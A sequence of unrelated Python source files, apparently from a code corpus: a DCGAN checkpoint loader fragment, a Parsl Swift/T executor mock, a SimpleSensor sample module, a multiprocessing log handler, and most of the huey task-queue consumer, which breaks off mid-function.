os.makedirs(checkpoint_dir)
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir):
import re
print(" [*] Reading checkpoints...")
checkpoint_dir = os.path.join(checkpoint_dir, self.model_dir)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
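            # The regex below grabs the trailing digits of the checkpoint file name,
            # e.g. a name like "DCGAN.model-1500" yields counter 1500 so training can resume there.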
counter = int(next(re.finditer("(\d+)(?!.*\d)",ckpt_name)).group(0))
print(" [*] Success to read {}".format(ckpt_name))
return True, counter
else:
print(" [*] Failed to find a checkpoint")
return False, 0
|
swift_t.py
|
"""Sample Executor for integration with SwiftT.
This follows the model used by `EMEWS <http://www.mcs.anl.gov/~wozniak/papers/Cancer2_2016.pdf>`_
to some extent.
"""
from concurrent.futures import Future
import logging
import uuid
import threading
import queue
import multiprocessing as mp
from ipyparallel.serialize import pack_apply_message, unpack_apply_message
from ipyparallel.serialize import serialize_object, deserialize_object
from parsl.executors.status_handling import NoStatusHandlingExecutor
logger = logging.getLogger(__name__)
BUFFER_THRESHOLD = 1024 * 1024
ITEM_THRESHOLD = 1024
def runner(incoming_q, outgoing_q):
"""This is a function that mocks the Swift-T side.
    It listens on the incoming_q for tasks and posts results on the outgoing_q.
Args:
- incoming_q (Queue object) : The queue to listen on
- outgoing_q (Queue object) : Queue to post results on
The messages posted on the incoming_q will be of the form :
.. code:: python
{
"task_id" : <uuid.uuid4 string>,
"buffer" : serialized buffer containing the fn, args and kwargs
}
If ``None`` is received, the runner will exit.
Response messages should be of the form:
.. code:: python
{
"task_id" : <uuid.uuid4 string>,
"result" : serialized buffer containing result
"exception" : serialized exception object
}
On exiting the runner will post ``None`` to the outgoing_q
"""
logger.debug("[RUNNER] Starting")
def execute_task(bufs):
"""Deserialize the buffer and execute the task.
Returns the serialized result or exception.
"""
user_ns = locals()
user_ns.update({'__builtins__': __builtins__})
f, args, kwargs = unpack_apply_message(bufs, user_ns, copy=False)
fname = getattr(f, '__name__', 'f')
prefix = "parsl_"
fname = prefix + "f"
argname = prefix + "args"
kwargname = prefix + "kwargs"
resultname = prefix + "result"
user_ns.update({fname: f,
argname: args,
kwargname: kwargs,
resultname: resultname})
code = "{0} = {1}(*{2}, **{3})".format(resultname, fname,
argname, kwargname)
try:
logger.debug("[RUNNER] Executing: {0}".format(code))
exec(code, user_ns, user_ns)
except Exception as e:
logger.warning("Caught exception; will raise it: {}".format(e))
raise e
else:
logger.debug("[RUNNER] Result: {0}".format(user_ns.get(resultname)))
return user_ns.get(resultname)
while True:
try:
# Blocking wait on the queue
msg = incoming_q.get(block=True, timeout=10)
except queue.Empty:
# Handle case where no items were in the queue
logger.debug("[RUNNER] Queue is empty")
except IOError as e:
logger.debug("[RUNNER] Broken pipe: {}".format(e))
try:
# Attempt to send a stop notification to the management thread
outgoing_q.put(None)
except Exception:
pass
break
except Exception as e:
logger.debug("[RUNNER] Caught unknown exception: {}".format(e))
else:
# Handle received message
if not msg:
# Empty message is a die request
logger.debug("[RUNNER] Received exit request")
outgoing_q.put(None)
break
else:
# Received a valid message, handle it
logger.debug("[RUNNER] Got a valid task with ID {}".format(msg["task_id"]))
try:
response_obj = execute_task(msg['buffer'])
response = {"task_id": msg["task_id"],
"result": serialize_object(response_obj)}
logger.debug("[RUNNER] Returing result: {}".format(
deserialize_object(response["result"])))
except Exception as e:
logger.debug("[RUNNER] Caught task exception: {}".format(e))
response = {"task_id": msg["task_id"],
"exception": serialize_object(e)}
outgoing_q.put(response)
logger.debug("[RUNNER] Terminating")
class TurbineExecutor(NoStatusHandlingExecutor):
"""The Turbine executor.
    Bypass the Swift/T language and run on top of the Turbine engines
in an MPI environment.
Here is a diagram
.. code:: python
| Data | Executor | IPC | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|outgoing_q -|-> Worker_Process
| | | | | | |
Parsl<---Fut-| | | | result exception
^ | | | | | |
| | | Q_mngmnt | | V V
| | | Thread<--|incoming_q<-|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
"""
def __init__(self, label='turbine', storage_access=None, working_dir=None, managed=True):
"""Initialize the thread pool.
Trying to implement the emews model.
"""
NoStatusHandlingExecutor.__init__(self)
logger.debug("Initializing TurbineExecutor")
self.label = label
self.storage_access = storage_access
self.working_dir = working_dir
self.managed = managed
def start(self):
self.mp_manager = mp.Manager()
self.outgoing_q = self.mp_manager.Queue()
self.incoming_q = self.mp_manager.Queue()
self.is_alive = True
self._queue_management_thread = None
self._start_queue_management_thread()
logger.debug("Created management thread : %s", self._queue_management_thread)
self.worker = mp.Process(target=runner, args=(self.outgoing_q, self.incoming_q))
self.worker.start()
logger.debug("Created worker : %s", self.worker)
self._scaling_enabled = False
def _queue_management_worker(self):
"""Listen to the queue for task status messages and handle them.
Depending on the message, tasks will be updated with results, exceptions,
or updates. It expects the following messages:
.. code:: python
{
"task_id" : <task_id>
"result" : serialized result object, if task succeeded
... more tags could be added later
}
{
"task_id" : <task_id>
"exception" : serialized exception object, on failure
}
We do not support these yet, but they could be added easily.
.. code:: python
{
"task_id" : <task_id>
"cpu_stat" : <>
"mem_stat" : <>
"io_stat" : <>
"started" : tstamp
}
The `None` message is a die request.
"""
while True:
logger.debug("[MTHREAD] Management thread active")
try:
msg = self.incoming_q.get(block=True, timeout=1)
except queue.Empty:
# Timed out.
pass
except IOError as e:
logger.debug("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
return
except Exception as e:
logger.debug("[MTHREAD] Caught unknown exception: {}".format(e))
else:
if msg is None:
logger.debug("[MTHREAD] Got None")
return
else:
logger.debug("[MTHREAD] Received message: {}".format(msg))
task_fut = self.tasks[msg['task_id']]
if 'result' in msg:
result, _ = deserialize_object(msg['result'])
task_fut.set_result(result)
elif 'exception' in msg:
exception, _ = deserialize_object(msg['exception'])
task_fut.set_exception(exception)
if not self.is_alive:
break
# When the executor gets lost, the weakref callback will wake up
# the queue management thread.
def weakref_cb(self, q=None):
"""We do not use this yet."""
q.put(None)
def _start_queue_management_thread(self):
"""Method to start the management thread as a daemon.
Checks if a thread already exists, then starts it.
Could be used later as a restart if the management thread dies.
"""
logging.debug("In _start %s", "*" * 40)
if self._queue_management_thread is None:
logging.debug("Starting management thread ")
self._queue_management_thread = threading.Thread(target=self._queue_management_worker)
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
else:
logging.debug("Management thread already exists, returning")
def shutdown(self):
"""Shutdown method, to kill the threads and workers."""
self.is_alive = False
logging.debug("Waking management thread")
self.incoming_q.put(None) # Wake up the thread
self._queue_management_thread.join() # Force join
logging.debug("Exiting thread")
self.worker.join()
return True
def submit(self, func, *args, **kwargs):
"""Submits work to the the outgoing_q.
The outgoing_q is an external process listens on this
queue for new work. This method is simply pass through and behaves like a
submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_
Args:
- func (callable) : Callable function
- *args (list) : List of arbitrary positional arguments.
Kwargs:
- **kwargs (dict) : A dictionary of arbitrary keyword args for func.
Returns:
Future
"""
task_id = uuid.uuid4()
logger.debug("Pushing function {} to queue with args {}".format(func, args))
self.tasks[task_id] = Future()
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024,
item_threshold=1024)
msg = {"task_id": task_id,
"buffer": fn_buf}
        # Post task to the outgoing queue
self.outgoing_q.put(msg)
# Return the future
return self.tasks[task_id]
@property
def scaling_enabled(self):
return self._scaling_enabled
def scale_out(self, blocks=1):
"""Scales out the number of active workers by 1.
This method is not implemented for threads and will raise the error if called.
This would be nice to have, and can be done
Raises:
NotImplementedError
"""
raise NotImplementedError
def scale_in(self, blocks):
"""Scale in the number of active blocks by specified amount.
This method is not implemented for turbine and will raise an error if called.
Raises:
NotImplementedError
"""
raise NotImplementedError
if __name__ == "__main__":
print("Start")
turb_x = TurbineExecutor()
print("Done")
|
communicationModule.py
|
"""
Sample structure for a communication point module.
This module describes the basic uses of SimpleSensor.
To make your own module, this is a good place to start.
This module will receive large_number events and log/count them,
once the threshold is reached as set in config/module.conf, shutdown.
"""
# Standard imports, usually used by all communication modules
from simplesensor.collection_modules.collection_base import moduleConfigLoader as configLoader
from simplesensor.shared import ThreadsafeLogger, Message, ModuleProcess
from threading import Thread
# Module specific imports
import time
class CommunicationModule(ModuleProcess):
# You can keep these parameters the same, all modules receive the same params
# self - reference to self
# baseConfig - configuration settings defined in /simplesensor/config/base.conf
# (https://github.com/AdobeAtAdobe/SimpleSensor/blob/master/config/base.conf)
# pInBoundQueue - messages from handler to this module
# pOutBoundQueue - messages from this module to other modules
# loggingQueue - logging messages for threadsafe logger
def __init__(self, baseConfig, pInBoundQueue, pOutBoundQueue, loggingQueue):
"""
        Initialize new CommunicationModule instance.
        """
        super(CommunicationModule, self).__init__()
# Most collection modules will follow a similar pattern...
# 1. Set up some variables on the self object
self.outQueue = pOutBoundQueue
        self.inQueue = pInBoundQueue
self.loggingQueue = loggingQueue
self.threadProcessQueue = None
        self.counter = 0
self.alive = False
# 2. Load the module's configuration file
# Configs
self.moduleConfig = configLoader.load(self.loggingQueue, __name__)
self.config = baseConfig
# 3. Set some constants to the self object from config parameters (if you want)
self._bigNumberThreshold = self.moduleConfig['BigNumberThreshold']
# 4. Create a threadsafe logger object
self.logger = ThreadsafeLogger(loggingQueue, __name__)
def run(self):
"""
Main process method, run when the thread's start() function is called.
Starts monitoring inbound messages to this module.
Usually, any messages going out from communication modules to other
modules will depend on incoming messages.
Typically, a communication module would handle outgoing messages to
connected clients over some protocol, but this is a toy example.
"""
        # Begin monitoring inbound queue
        self.listen()
    def listen(self):
        """
        Start thread to monitor inbound messages, declare module alive.
        """
        self.alive = True
        self.threadProcessQueue = Thread(target=self.processQueue)
        self.threadProcessQueue.setDaemon(True)
        self.threadProcessQueue.start()
def processQueue(self):
"""
Process inbound messages on separate thread.
When a message is encountered, trigger an event to handle it.
Sleep for some small amount of time to avoid overloading.
Also receives a SHUTDOWN message from the main process when
the user presses the esc key.
"""
self.logger.info("Starting to watch collection point inbound message queue")
while self.alive:
if (self.inQueue.empty() == False):
self.logger.info("Queue size is %s" % self.inQueue.qsize())
try:
message = self.inQueue.get(block=False,timeout=1)
if message is not None:
if (message.topic.upper()=="SHUTDOWN" and
message.sender_id.lower()=='main'):
self.logger.info("SHUTDOWN command received on %s" % __name__)
self.shutdown()
else:
self.handleMessage(message)
except Exception as e:
self.logger.error("Error, unable to read queue: %s " %e)
self.shutdown()
self.logger.info("Queue size is %s after" % self.inQueue.qsize())
else:
time.sleep(.25)
def handleMessage(self, message):
"""
Handle messages from other modules to this one.
Switch on the message topic, do something with the data fields.
"""
# Parameter checking, data cleaning goes here
try:
assert message.topic is not None
assert message.extended_data is not None
assert message.extended_data.the_number is not None
        except Exception:
            self.logger.error('Error, invalid message: %s' % message)
            return
        if message.topic == 'large_number':
            self.logger.info('Module %s encountered a large number: %s' % (message.sender_id, message.extended_data.the_number))
self.counter += 1
if self.counter > self._bigNumberThreshold:
self.shutdown()
def shutdown(self):
"""
Shutdown the communication module.
Set alive flag to false so it stops looping.
Wait for things to die, then exit.
"""
self.alive = False
self.logger.info("Shutting down")
# Do any extra clean up here
# for example, joining threads if you spawn more
time.sleep(1)
self.exit = True
|
logger_threads.py
|
import sys
import logging
import traceback
import threading
import multiprocessing
from datetime import time, datetime
from logging import FileHandler as FH
from time import sleep
# ============================================================================
# Define Log Handler
# ============================================================================
class CustomLogHandler(logging.Handler):
"""multiprocessing log handler
This handler makes it possible for several processes
to log to the same file by using a queue.
"""
def __init__(self, fname):
super(CustomLogHandler, self).__init__()
self._handler = FH(fname)
self.queue = multiprocessing.Queue()
thrd = threading.Thread(target=self.receive)
thrd.daemon = True
thrd.name = 'Logging Thread'
thrd.start()
def setFormatter(self, fmt):
logging.Handler.setFormatter(self, fmt)
self._handler.setFormatter(fmt)
def receive(self):
while True:
try:
record = self.queue.get()
self._handler.emit(record)
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
break
except:
traceback.print_exc(file=sys.stderr)
def send(self,s):
self.queue.put_nowait(s)
def _format_record(self, record):
times=datetime.fromtimestamp(record.created)
level=record.levelname
record.msg='{} LOGLEVEL:{} MESSAGE:{}'.format(str(times),level,record.msg)
return record
def emit(self, record):
try:
self.send(self._format_record(record))
except (KeyboardInterrupt, SystemExit) as e:
raise e
except Exception:
self.handleError(record)
def close(self):
self._handler.close()
logging.Handler.close(self)
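# A minimal usage sketch (not part of the original module; 'example.log' is a hypothetical path).
# Attaching the handler routes records from this and any child processes through one queue/file.
if __name__ == '__main__':
    handler = CustomLogHandler('example.log')
    root = logging.getLogger()
    root.addHandler(handler)
    root.setLevel(logging.INFO)
    logging.info('hello from process %s', multiprocessing.current_process().pid)
    sleep(0.1)  # give the logging thread a moment to drain the queue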
|
consumer.py
|
import datetime
import logging
import os
import signal
import sys
import threading
import time
from multiprocessing import Event as ProcessEvent
from multiprocessing import Process
try:
import gevent
from gevent import Greenlet
from gevent.event import Event as GreenEvent
except ImportError:
Greenlet = GreenEvent = None
from huey.constants import WORKER_GREENLET
from huey.constants import WORKER_PROCESS
from huey.constants import WORKER_THREAD
from huey.constants import WORKER_TYPES
from huey.exceptions import CancelExecution
from huey.exceptions import ConfigurationError
from huey.exceptions import DataStoreGetException
from huey.exceptions import QueueException
from huey.exceptions import QueueReadException
from huey.exceptions import DataStorePutException
from huey.exceptions import QueueWriteException
from huey.exceptions import RetryTask
from huey.exceptions import ScheduleAddException
from huey.exceptions import ScheduleReadException
from huey.exceptions import TaskLockedException
EVENT_CHECKING_PERIODIC = 'checking-periodic'
EVENT_ERROR_DEQUEUEING = 'error-dequeueing'
EVENT_ERROR_ENQUEUEING = 'error-enqueueing'
EVENT_ERROR_INTERNAL = 'error-internal'
EVENT_ERROR_SCHEDULING = 'error-scheduling'
EVENT_ERROR_STORING_RESULT = 'error-storing-result'
EVENT_ERROR_TASK = 'error-task'
EVENT_LOCKED = 'locked'
EVENT_FINISHED = 'finished'
EVENT_RETRYING = 'retrying'
EVENT_REVOKED = 'revoked'
EVENT_SCHEDULED = 'scheduled'
EVENT_SCHEDULING_PERIODIC = 'scheduling-periodic'
EVENT_STARTED = 'started'
EVENT_TIMEOUT = 'timeout'
def to_timestamp(dt):
if dt:
return time.mktime(dt.timetuple())
class BaseProcess(object):
"""
Abstract process run by the consumer. Provides convenience methods for
things like sleeping for a given amount of time and enqueueing tasks.
Subclasses should implement the `loop()` method, which is called repeatedly
until the consumer is shutdown. The `loop()` method's return value is
ignored, but an unhandled exception will lead to the process shutting down.
A typical pattern might be::
class CustomProcess(BaseProcess):
def loop(self, now=None):
# Get the current timestamp.
current_ts = time.time()
# Perform some action, which may take an arbitrary amount of
# time.
do_some_action()
# Sleep for 60 seconds, with respect to current_ts, so that
# the whole loop() method repeats every ~60s.
self.sleep_for_interval(current_ts, 60)
You will want to ensure that the consumer starts your custom process::
class MyConsumer(Consumer):
def start(self):
# Initialize workers, scheduler, signal handlers, etc.
super(MyConsumer, self).start()
# Create custom process and start it.
custom_impl = CustomProcess(huey=self.huey, utc=self.utc)
self._custom_proc = self._create_process(custom_impl, 'Custom')
self._custom_proc.start()
See also: Consumer._create_process().
"""
def __init__(self, huey, utc):
self.huey = huey
self.utc = utc
def initialize(self):
pass
def get_now(self):
if self.utc:
return datetime.datetime.utcnow()
return datetime.datetime.now()
def get_utcnow(self):
return datetime.datetime.utcnow()
def get_timestamp(self):
return time.mktime(self.get_utcnow().timetuple())
def sleep_for_interval(self, start_ts, nseconds):
"""
Sleep for a given interval with respect to the start timestamp.
So, if the start timestamp is 1337 and nseconds is 10, the method will
actually sleep for nseconds - (current_timestamp - start_timestamp). So
if the current timestamp is 1340, we'll only sleep for 7 seconds (the
goal being to sleep until 1347, or 1337 + 10).
"""
sleep_time = nseconds - (time.time() - start_ts)
if sleep_time <= 0:
return
self._logger.debug('Sleeping for %s', sleep_time)
# Recompute time to sleep to improve accuracy in case the process was
# pre-empted by the kernel while logging.
sleep_time = nseconds - (time.time() - start_ts)
if sleep_time > 0:
time.sleep(sleep_time)
def enqueue(self, task):
"""
Convenience method for enqueueing a task.
"""
try:
self.huey.enqueue(task)
except QueueWriteException:
self.huey.emit_task(EVENT_ERROR_ENQUEUEING, task, error=True)
self._logger.exception('Error enqueueing task: %s', task)
else:
self._logger.debug('Enqueued task: %s', task)
def loop(self, now=None):
"""
Process-specific implementation. Called repeatedly for as long as the
consumer is running. The `now` parameter is currently only used in the
unit-tests (to avoid monkey-patching datetime / time). Return value is
ignored, but an unhandled exception will lead to the process exiting.
"""
raise NotImplementedError
class Worker(BaseProcess):
"""
Worker implementation.
Will pull tasks from the queue, executing them or adding them to the
schedule if they are set to run in the future.
"""
def __init__(self, huey, default_delay, max_delay, backoff, utc):
self.delay = self.default_delay = default_delay
self.max_delay = max_delay
self.backoff = backoff
self._logger = logging.getLogger('huey.consumer.Worker')
self._pre_execute = huey.pre_execute_hooks.items()
self._post_execute = huey.post_execute_hooks.items()
super(Worker, self).__init__(huey, utc)
def initialize(self):
for name, startup_hook in self.huey.startup_hooks.items():
self._logger.debug('calling startup hook "%s"', name)
try:
startup_hook()
except Exception as exc:
self._logger.exception('startup hook "%s" failed', name)
def loop(self, now=None):
task = None
exc_raised = True
try:
task = self.huey.dequeue()
except QueueReadException:
self.huey.emit_status(EVENT_ERROR_DEQUEUEING, error=True)
self._logger.exception('Error reading from queue')
except QueueException:
self.huey.emit_status(EVENT_ERROR_INTERNAL, error=True)
self._logger.exception('Queue exception')
except KeyboardInterrupt:
raise
except:
self.huey.emit_status(EVENT_ERROR_DEQUEUEING, error=True)
self._logger.exception('Unknown exception dequeueing task.')
else:
exc_raised = False
if task:
self.delay = self.default_delay
self.handle_task(task, now or self.get_now())
elif exc_raised or not self.huey.blocking:
self.sleep()
def sleep(self):
if self.delay > self.max_delay:
self.delay = self.max_delay
self._logger.debug('No messages, sleeping for: %s', self.delay)
time.sleep(self.delay)
self.delay *= self.backoff
def handle_task(self, task, ts):
"""
Handle a task that was just read from the queue. There are three
possible outcomes:
1. Task is scheduled for the future, add to the schedule.
2. Task is ready to run, but has been revoked. Discard.
3. Task is ready to run and not revoked. Execute task.
"""
if not self.huey.ready_to_run(task, ts):
self.add_schedule(task)
elif not self.is_revoked(task, ts):
self.process_task(task, ts)
else:
self.huey.emit_task(
EVENT_REVOKED,
task,
timestamp=to_timestamp(ts))
self._logger.debug('Task %s was revoked, not running', task)
def process_task(self, task, ts):
"""
Execute a task and (optionally) store the return value in result store.
Unhandled exceptions are caught and logged.
"""
self.huey.emit_task(EVENT_STARTED, task, timestamp=to_timestamp(ts))
if self._pre_execute:
try:
self.run_pre_execute_hooks(task)
except CancelExecution:
return
self._logger.info('Executing %s', task)
start = time.time()
exception = None
task_value = None
try:
try:
task_value = self.huey.execute(task)
finally:
duration = time.time() - start
except DataStorePutException:
self._logger.exception('Error storing result')
self.huey.emit_task(
EVENT_ERROR_STORING_RESULT,
task,
error=True,
duration=duration)
except TaskLockedException as exc:
self._logger.warning('Task %s could not run, unable to obtain '
'lock.', task.task_id)
self.huey.emit_task(
EVENT_LOCKED,
task,
error=False,
duration=duration)
exception = exc
except RetryTask:
if not task.retries:
self._logger.error('Cannot retry task %s - no retries '
'remaining.', task.task_id)
exception = True
except KeyboardInterrupt:
self._logger.info('Received exit signal, task %s did not finish.',
task.task_id)
return
except Exception as exc:
self._logger.exception('Unhandled exception in worker thread')
self.huey.emit_task(
EVENT_ERROR_TASK,
task,
error=True,
duration=duration)
exception = exc
else:
self._logger.info('Executed %s in %0.3fs', task, duration)
self.huey.emit_task(
EVENT_FINISHED,
task,
duration=duration,
timestamp=self.get_timestamp())
if self._post_execute:
self.run_post_execute_hooks(task, task_value, exception)
if exception is not None and task.retries:
self.requeue_task(task, self.get_now())
def run_pre_execute_hooks(self, task):
self._logger.info('Running pre-execute hooks for %s', task)
for name, callback in self._pre_execute:
self._logger.debug('Executing %s pre-execute hook.', name)
try:
callback(task)
except CancelExecution:
self._logger.info('Execution of %s cancelled by %s.', task,
name)
raise
except Exception:
self._logger.exception('Unhandled exception calling pre-'
'execute hook %s for %s.', name, task)
def run_post_execute_hooks(self, task, task_value, exception):
self._logger.info('Running post-execute hooks for %s', task)
for name, callback in self._post_execute:
self._logger.debug('Executing %s post-execute hook.', name)
try:
callback(task, task_value, exception)
except Exception as exc:
self._logger.exception('Unhandled exception calling post-'
'execute hook %s for %s.', name, task)
def requeue_task(self, task, ts):
task.retries -= 1
self.huey.emit_task(EVENT_RETRYING, task)
self._logger.info('Re-enqueueing task %s, %s tries left',
task.task_id, task.retries)
if task.retry_delay:
delay = datetime.timedelta(seconds=task.retry_delay)
task.execute_time = ts + delay
self.add_schedule(task)
else:
self.enqueue(task)
def add_schedule(self, task):
self._logger.info('Adding %s to schedule', task)
try:
self.huey.add_schedule(task)
except ScheduleAddException:
self.huey.emit_task(EVENT_ERROR_SCHEDULING, task, error=True)
self._logger.error('Error adding task to schedule: %s', task)
else:
self.huey.emit_task(EVENT_SCHEDULED, task)
def is_revoked(self, task, ts):
try:
if self.huey.is_revoked(task, ts, peek=False):
return True
return False
except DataStoreGetException:
self.huey.emit_task(EVENT_ERROR_INTERNAL, task, error=True)
self._logger.error('Error checking if task is revoked: %s', task)
return True
class Scheduler(BaseProcess):
"""
Scheduler handles enqueueing tasks when they are scheduled to execute. Note
that the scheduler does not actually execute any tasks, but simply enqueues
them so that they can be picked up by the worker processes.
If periodic tasks are enabled, the scheduler will wake up every 60 seconds
to enqueue any periodic tasks that should be run.
"""
def __init__(self, huey, interval, utc, periodic):
super(Scheduler, self).__init__(huey, utc)
self.interval = min(interval, 60)
self.periodic = periodic
if periodic:
# Determine the periodic task interval.
self._counter = 0
self._q, self._r = divmod(60, self.interval)
self._cr = self._r
self._logger = logging.getLogger('huey.consumer.Scheduler')
self._next_loop = time.time()
def loop(self, now=None):
current = self._next_loop
self._next_loop += self.interval
if self._next_loop < time.time():
self._logger.info('scheduler skipping iteration to avoid race.')
return
try:
task_list = self.huey.read_schedule(now or self.get_now())
except ScheduleReadException:
#self.huey.emit_task(EVENT_ERROR_SCHEDULING, task, error=True)
self._logger.exception('Error reading from task schedule.')
else:
for task in task_list:
self._logger.info('Scheduling %s for execution', task)
self.enqueue(task)
if self.periodic:
# The scheduler has an interesting property of being able to run at
# intervals that are not factors of 60. Suppose we ask our
# scheduler to run every 45 seconds. We still want to schedule
# periodic tasks once per minute, however. So we use a running
# remainder to ensure that no matter what interval the scheduler is
# running at, we still are enqueueing tasks once per minute at the
# same time.
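            # Worked example (hypothetical numbers): with interval=45, divmod(60, 45)
            # gives _q=1 and _r=15, so every other iteration sleeps the extra remainder
            # before enqueueing, and periodic tasks still fire at t=60, 120, 180, ...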
if self._counter >= self._q:
self._counter = 0
if self._cr:
self.sleep_for_interval(current, self._cr)
if self._r:
self._cr += self._r
if self._cr >= self.interval:
self._cr -= self.interval
self._counter -= 1
self.enqueue_periodic_tasks(now or self.get_now(), current)
self._counter += 1
self.sleep_for_interval(current, self.interval)
def enqueue_periodic_tasks(self, now, start):
self.huey.emit_status(
EVENT_CHECKING_PERIODIC,
timestamp=self.get_timestamp())
self._logger.debug('Checking periodic tasks')
for task in self.huey.read_periodic(now):
self.huey.emit_task(
EVENT_SCHEDULING_PERIODIC,
task,
timestamp=self.get_timestamp())
self._logger.info('Scheduling periodic task %s.', task)
self.enqueue(task)
return True
class Environment(object):
"""
Provide a common interface to the supported concurrent environments.
"""
def get_stop_flag(self):
raise NotImplementedError
def create_process(self, runnable, name):
raise NotImplementedError
def is_alive(self, proc):
raise NotImplementedError
class ThreadEnvironment(Environment):
def get_stop_flag(self):
return threading.Event()
def create_process(self, runnable, name):
t = threading.Thread(target=runnable, name=name)
t.daemon = True
return t
def is_alive(self, proc):
return proc.isAlive()
class GreenletEnvironment(Environment):
def get_stop_flag(self):
return GreenEvent()
def create_process(self, runnable, name):
def run_wrapper():
gevent.sleep()
runnable()
gevent.sleep()
return Greenlet(run=run_wrapper)
def is_alive(self, proc):
return not proc.dead
class ProcessEnvironment(Environment):
def get_stop_flag(self):
return ProcessEvent()
def create_process(self, runnable, name):
p = Process(target=runnable, name=name)
p.daemon = True
return p
def is_alive(self, proc):
return proc.is_alive()
WORKER_TO_ENVIRONMENT = {
WORKER_THREAD: ThreadEnvironment,
WORKER_GREENLET: GreenletEnvironment,
'gevent': GreenletEnvironment, # Preserved for backwards-compat.
WORKER_PROCESS: ProcessEnvironment,
}
class Consumer(object):
"""
Consumer sets up and coordinates the execution of the workers and scheduler
and registers signal handlers.
"""
def __init__(self, huey, workers=1, periodic=True, initial_delay=0.1,
backoff=1.15, max_delay=10.0, utc=True, scheduler_interval=1,
worker_type='thread', check_worker_health=True,
health_check_interval=1, flush_locks=False):
self._logger = logging.getLogger('huey.consumer')
if huey.always_eager:
self._logger.warning('Consumer initialized with Huey instance '
'that has "always_eager" mode enabled. This '
'must be disabled before the consumer can '
'be run.')
self.huey = huey
self.workers = workers # Number of workers.
self.periodic = periodic # Enable periodic task scheduler?
self.default_delay = initial_delay # Default queue polling interval.
self.backoff = backoff # Exponential backoff factor when queue empty.
self.max_delay = max_delay # Maximum interval between polling events.
self.utc = utc # Timestamps are considered UTC.
# Ensure that the scheduler runs at an interval between 1 and 60s.
self.scheduler_interval = max(min(scheduler_interval, 60), 1)
self.worker_type = worker_type # What process model are we using?
# Configure health-check and consumer main-loop attributes.
self._stop_flag_timeout = 0.1
self._health_check = check_worker_health
self._health_check_interval = float(health_check_interval)
# Create the execution environment helper.
self.environment = self.get_environment(self.worker_type)
# Create the event used to signal the process should terminate. We'll
# also store a boolean flag to indicate whether we should restart after
# the processes are cleaned up.
self._received_signal = False
self._restart = False
self._graceful = True
self.stop_flag = self.environment.get_stop_flag()
# In the event the consumer was killed while running a task that held
# a lock, this ensures that all locks are flushed before starting.
if flush_locks:
self.flush_locks()
# Create the scheduler process (but don't start it yet).
scheduler = self._create_scheduler()
self.scheduler = self._create_process(scheduler, 'Scheduler')
# Create the worker process(es) (also not started yet).
self.worker_threads = []
for i in range(workers):
worker = self._create_worker()
process = self._create_process(worker, 'Worker-%d' % (i + 1))
# The worker threads are stored as [(worker impl, worker_t), ...].
# The worker impl is not currently referenced in any consumer code,
# but it is referenced in the test-suite.
self.worker_threads.append((worker, process))
def flush_locks(self):
self._logger.debug('Flushing locks before starting up.')
flushed = self.huey.flush_locks()
if flushed:
self._logger.warning('Found stale locks: %s' % (
', '.join(key for key in flushed)))
def get_environment(self, worker_type):
if worker_type not in WORKER_TO_ENVIRONMENT:
raise ValueError('worker_type must be one of %s.' %
', '.join(WORKER_TYPES))
return WORKER_TO_ENVIRONMENT[worker_type]()
def _create_worker(self):
return Worker(
huey=self.huey,
default_delay=self.default_delay,
max_delay=self.max_delay,
backoff=self.backoff,
utc=self.utc)
def _create_scheduler(self):
return Scheduler(
huey=self.huey,
interval=self.scheduler_interval,
utc=self.utc,
periodic=self.periodic)
def _create_process(self, process, name):
"""
Repeatedly call the `loop()` method of the given process. Unhandled
exceptions in the `loop()` method will cause the process to terminate.
"""
def _run():
process.initialize()
try:
while not self.stop_flag.is_set():
process.loop()
except KeyboardInterrupt:
pass
except:
self._logger.exception('Process %s died!', name)
return self.environment.create_process(_run, name)
def start(self):
"""
Start all consumer processes and register signal handlers.
"""
if self.huey.always_eager:
raise ConfigurationError(
'Consumer cannot be run with Huey instances where always_eager'
' is enabled. Please check your configuration and ensure that'
' "huey.always_eager = False".')
# Log startup message.
self._logger.info('Huey consumer started with %s %s, PID %s',
self.workers, self.worker_type, os.getpid())
self._logger.info('Scheduler runs every %s second(s).',
self.scheduler_interval)
self._logger.info('Periodic tasks are %s.',
'enabled' if self.periodic else 'disabled')
self._logger.info('UTC is %s.', 'enabled' if self.utc else 'disabled')
self._set_signal_handlers()
msg = ['The following commands are available:']
for command in self.huey.registry._registry:
msg.append('+ %s' % command.replace('queuecmd_', ''))
self._logger.info('\n'.join(msg))
# We'll temporarily ignore SIGINT and SIGHUP (so that it is inherited
# by the child-processes). Once the child processes are created, we
# restore the handler.
original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)
if hasattr(signal, 'SIGHUP'):
original_sighup_handler = signal.signal(signal.SIGHUP, signal.SIG_IGN)
self.scheduler.start()
for _, worker_process in self.worker_threads:
worker_process.start()
signal.signal(signal.SIGINT, original_sigint_handler)
if hasattr(signal, 'SIGHUP'):
signal.signal(signal.SIGHUP, original_sighup_handler)
def stop(self, graceful=False):
"""
Set the stop-flag.
        If `graceful=True`, this method blocks until the workers finish
executing any tasks they might be currently working on.
"""
self.stop_flag.set()
if graceful:
self._logger.info('Shutting down gracefully...')
try:
for _, worker_process in self.worker_threads:
worker_process.join()
except KeyboardInterrupt:
self._logger.info('Received request to shut down now.')
else:
self._logger.info('All workers have stopped.')
else:
self._logger.info('Shutting down')
def run(self):
"""
Run the consumer.
"""
self.start()
timeout = self._stop_flag_timeout
health_check_ts = time.time()
while True:
try:
self.stop_flag.wait(timeout=timeout)
except KeyboardInterrupt:
self._logger.info('Received SIGINT')
self.stop(graceful=True)
except:
self._logger.exception('Error in consumer.')
self.stop()
else:
if self._received_signal:
self.stop(graceful=self._graceful)
if self.stop_flag.is_set():
break
if self._health_check:
now = time.time()
if now >= health_check_ts + self._health_check_interval:
health_check_ts = now
self.check_worker_health()
if self._restart:
self._logger.info('Consumer will restart.')
python = sys.executable
